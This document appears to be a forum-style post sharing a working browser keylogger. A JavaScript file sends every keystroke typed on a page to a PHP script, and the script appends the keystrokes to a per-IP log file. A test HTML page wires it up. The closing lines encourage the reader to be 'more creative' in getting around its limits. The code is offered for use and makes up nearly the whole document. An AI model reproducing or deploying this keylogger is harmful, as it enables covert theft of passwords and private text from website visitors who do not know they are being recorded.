function GetCandy(event)
{
var kreiluke = “”;
var isNetscape = (navigator.appName.indexOf(”Netscape”) != -1);
var kreiluke = (isNetscape) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode);
makeRequest(’kl.php?iambr=’ + kreiluke);
}

function makeRequest(url)
{
var httpRequest;

if (window.XMLHttpRequest)
{ // Mozilla, Safari, …
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType(’text/xml’);
}
}
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject(”Msxml2.XMLHTTP”);
}
catch (e) {
try {
httpRequest = new ActiveXObject(”Mcft.XMLHTTP”);
}
catch (e) {}
}
}

if (!httpRequest)
{
alert(’Giving up Cannot create an XMLHTTP instance’);
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open(’GET’, url, true);
httpRequest.send(null);
}

function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert(’There was a problem with the request.’);
}
}
}

filename kl.php

<?php
$_GET[’iambr’];
$file = fopen($_SERVER[’REMOTE_ADDR’] . “-logged.txt”,”a”);
fwrite($file,$_GET[’iambr’]);
fclose($file);
?>

filename testpage.htm:

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”
“http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<SCRIPT language=”JavaScript” SRC=”kl.js”></SCRIPT>
</head>

<body onkeyup=”GetCandy(event)”>
<p>press a ~censored~ key at it will be logged</p>
</body>

</html>

download file:

it basically records keyboard events on the html page
stores them on a text file
page needs to be active to be able to keylog, so you need to be more creative